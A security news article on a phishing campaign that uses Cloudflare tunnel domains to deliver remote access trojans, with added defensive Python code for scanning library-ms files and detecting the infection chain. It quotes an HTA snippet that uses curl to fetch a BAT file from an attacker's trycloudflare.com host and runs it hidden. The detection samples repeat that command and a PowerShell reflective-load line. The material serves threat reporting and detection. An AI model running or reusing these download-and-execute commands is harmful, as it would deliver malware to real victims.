Sophisticated attack abuses Cloudflare tunnel infrastructure to deliver malware
Attackers are abusing Cloudflare's tunnel infrastructure to distribute remote access trojans (RATs), spread through phishing emails posing as invoices or orders. The malicious attachment uses a seemingly harmless format to get past security gateways and connects to a remote resource to download the malware. The infection chain has several stages: an LNK file runs an HTA script, which downloads a BAT file that installs Python and executes malicious code. The final stage injects into the notepad.exe process and creates startup entries for persistence. Several security vendors have documented this threat, underscoring its complexity and stealth. 2025-4-22 21:4:24 Author: cybersecuritynews.com

Hackers Abuse Cloudflare Tunnel Infrastructure to Deliver Multiple RATs

Cybersecurity experts have identified a sophisticated attack campaign exploiting Cloudflare’s tunnel infrastructure to distribute various remote access trojans (RATs).

The infrastructure, which has demonstrated remarkable resilience since February 2024, serves as a distribution platform for malicious files and trojans that enable attackers to gain unauthorized access to victims’ systems.

Security vendors including Forcepoint, Fortinet, Orange, and Proofpoint have documented this persistent threat, highlighting its evolving nature and growing impact on organizations worldwide.


The primary infection vector begins with deceptive phishing emails containing malicious attachments disguised as invoices or orders.

These emails often create false urgency and may include fabricated conversation threads with forged replies to appear legitimate.

The attachment typically uses the “application/windows-library+xml” file format, which frequently bypasses email security gateways due to its seemingly innocuous nature compared to binary files.

When opened, this file establishes a connection to a remote WebDav resource hosted on the Cloudflare tunnel infrastructure.

Sekoia TDR (Threat Detection & Research) team analysts have been monitoring this attack infrastructure, internally referred to as “Cloudflare tunnel infrastructure to deliver multiple RATs.”

Their analysis reveals an intricate multi-stage infection chain that employs various obfuscation techniques to evade detection systems.

The complexity of this attack demonstrates how threat actors continue to develop innovative methods to bypass modern security controls, even in 2025.

The attackers leverage domains with the “trycloudflare.com” suffix, including “malawi-light-pill-bolt.trycloudflare.com,” “players-time-corresponding-th.trycloudflare.com,” and others to host their malicious content.

This infrastructure delivers payloads that ultimately establish persistent remote access to compromised systems, potentially enabling data theft and further network compromise.
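The attachment format described above is a Windows Library file (.library-ms), whose XML can point Explorer at a remote location. The following is an added example, not code from the article or from Sekoia, showing how a defender can parse such a file and flag remote locations whose host falls under trycloudflare.com. The sample document is constructed (only the hostname is one the article lists), the element names follow the public library-ms schema, and the UNC and https location forms are both handled because real samples may use either.

```python
# Added example (not from the article): scan a Windows Library file
# (.library-ms, MIME type application/windows-library+xml) for remote
# locations, the mechanism by which the attachment described above reaches a
# WebDAV share on a trycloudflare.com host. The sample file is constructed.
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple
from urllib.parse import urlparse

LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"

# Constructed sample in the shape of a library-ms file pointing at a remote
# WebDAV share. The hostname is one of the domains the article lists.
SAMPLE_LIBRARY_MS = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\players-time-corresponding-th.trycloudflare.com@SSL\DavWWWRoot\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Hostname suffixes a defender wants to see in a library file (assumption:
# extend with your own watch list).
SUSPICIOUS_SUFFIXES = ("trycloudflare.com",)


def extract_locations(library_xml: str) -> List[str]:
    """Return every <simpleLocation><url> value in a library-ms document."""
    root = ET.fromstring(library_xml)
    urls = []
    for loc in root.iter(f"{LIBRARY_NS}simpleLocation"):
        url = loc.find(f"{LIBRARY_NS}url")
        if url is not None and url.text:
            urls.append(url.text.strip())
    return urls


def location_host(location: str) -> Optional[str]:
    """Host name for a remote location (UNC or http/https); None if local."""
    lowered = location.lower()
    if lowered.startswith(("http://", "https://")):
        return urlparse(lowered).hostname
    if location.startswith("\\\\"):
        # UNC form \\host[@SSL][@port]\share\...; the WebDAV redirector uses @SSL
        first = location[2:].split("\\", 1)[0]
        return first.split("@", 1)[0].lower() or None
    return None  # drive letter, knownfolder: or similar: treated as local


def _matches_suffix(host: str, suffix: str) -> bool:
    # Exact match or a real subdomain; avoids "evil-trycloudflare.com" style misses
    return host == suffix or host.endswith("." + suffix)


def suspicious_locations(
    library_xml: str, suffixes: Tuple[str, ...] = SUSPICIOUS_SUFFIXES
) -> List[Tuple[str, str]]:
    """(host, location) pairs for remote locations under a watched suffix."""
    hits = []
    for loc in extract_locations(library_xml):
        host = location_host(loc)
        if host and any(_matches_suffix(host, s) for s in suffixes):
            hits.append((host, loc))
    return hits


if __name__ == "__main__":
    for host, loc in suspicious_locations(SAMPLE_LIBRARY_MS):
        print(f"remote library location on watched host {host}: {loc}")
```

Any remote location in a mailed library file is worth a look regardless of suffix; the suffix list only prioritises the hosts this campaign is known to use.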

Infection Chain Mechanics

The infection process begins when a user interacts with a LNK file disguised as a PDF document.

This shortcut, instead of opening a legitimate document, executes an HTA file from the same remote server. The HTA content reveals how the attack progresses:

' HTA stage as quoted in the article: fetch a BAT file from the tunnel host into %temp% and run it, hidden window
Set oShell = CreateObject("WScript.Shell")
oShell.Run "cmd.exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false
self.Close

This script triggers a BAT file that installs Python and executes obfuscated Python code, which then injects the next payload stage into “notepad.exe” processes.

Injection to notepad.exe (Source – Sekoia)

For persistence, the malware creates startup entries with two VBS files and another BAT file placed in the Windows Startup folder.

The final stage uses PowerShell to reflectively load a payload downloaded from a JPEG image with an embedded base64 payload.

This establishes the RAT’s connection to its command and control server, often using dynamic DNS services like “duckdns.org” for communication.
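The chain above (remote HTA, curl from a trycloudflare.com host into %temp%, Python injecting into notepad.exe, scripts dropped into the Startup folder, and PowerShell loading a payload out of a JPEG) leaves a recognisable trail in endpoint telemetry. The following is an added example, not code from the article or from Sekoia, that replays that chain as a handful of detection rules over constructed process-creation and file-creation events. The event field names are a simplified Sysmon-like layout and are an assumption; the ben.bat command line is the one the article quotes, and the other sample values are constructed.

```python
# Added example (not from the article): small detection rule set for the
# infection chain described above, run over constructed endpoint events.
# Field names (type, image, parent_image, command_line, target_filename) are
# a simplified Sysmon-like layout and are an assumption of this example.
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


def _cl(e: Event) -> str:
    return e.get("command_line", "").lower()


def _img(e: Event, key: str = "image") -> str:
    # basename of the executable path, lower-cased
    return e.get(key, "").lower().rsplit("\\", 1)[-1]


def rule_hta_from_remote(e: Event) -> bool:
    # mshta.exe started with an http(s) URL: the LNK -> remote HTA step
    return _img(e) == "mshta.exe" and re.search(r"https?://", _cl(e)) is not None


def rule_curl_trycloudflare_bat(e: Event) -> bool:
    # cmd.exe running curl against a trycloudflare.com host and handling a .bat
    cl = _cl(e)
    return (_img(e) == "cmd.exe" and "curl" in cl
            and "trycloudflare.com" in cl and ".bat" in cl)


def rule_python_spawns_notepad(e: Event) -> bool:
    # notepad.exe created by a Python interpreter: the injection target in the chain
    return _img(e) == "notepad.exe" and _img(e, "parent_image").startswith("python")


def rule_startup_script_drop(e: Event) -> bool:
    # .vbs/.bat written into a Startup folder (persistence step)
    target = e.get("target_filename", "").lower()
    return (e.get("type") == "file_create"
            and "\\start menu\\programs\\startup\\" in target
            and target.endswith((".vbs", ".bat")))


def rule_powershell_image_loader(e: Event) -> bool:
    # PowerShell fetching a JPEG and base64-decoding / reflectively loading from it
    cl = _cl(e)
    return (_img(e) == "powershell.exe"
            and re.search(r"\.jpe?g\b", cl) is not None
            and ("frombase64string" in cl or "reflection.assembly" in cl))


RULES: Dict[str, Callable[[Event], bool]] = {
    "hta_from_remote": rule_hta_from_remote,
    "curl_trycloudflare_bat": rule_curl_trycloudflare_bat,
    "python_spawns_notepad": rule_python_spawns_notepad,
    "startup_script_drop": rule_startup_script_drop,
    "powershell_image_loader": rule_powershell_image_loader,
}


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every rule that fires on every event."""
    return [(i, name) for i, e in enumerate(events)
            for name, fn in RULES.items() if fn(e)]


# Constructed sample events walking the chain, plus one benign notepad launch.
SAMPLE_EVENTS: List[Event] = [
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://players-time-corresponding-th.trycloudflare.com/CONSTRUCTED.hta"},
    {"type": "process_create", "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat"},
    {"type": "process_create",
     "parent_image": r"C:\Users\alice\AppData\Local\Programs\Python\Python312\python.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
    {"type": "file_create", "image": r"C:\Windows\System32\cmd.exe",
     "target_filename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"},
    {"type": "process_create", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden $b=(Invoke-WebRequest https://CONSTRUCTED.duckdns.org/pic.jpg).Content; [Reflection.Assembly]::Load([Convert]::FromBase64String($x))"},
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule on its own is noisy in a large estate; the value is in seeing several of them fire on one host within a short window, which is what the multi-stage chain produces.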

Infection chains (Source – Sekoia)

Infection chains distributing AsyncRAT via a complex multi-stage process involving Windows-library files, LNK files, HTA execution, and Python injection.

The evolution of this attack campaign demonstrates how threat actors continuously adapt their techniques to bypass security controls, emphasizing the importance of multi-layered detection approaches and continuous monitoring for similar attack patterns.



Article source: https://cybersecuritynews.com/hackers-abuse-cloudflare-tunnel-infrastructure/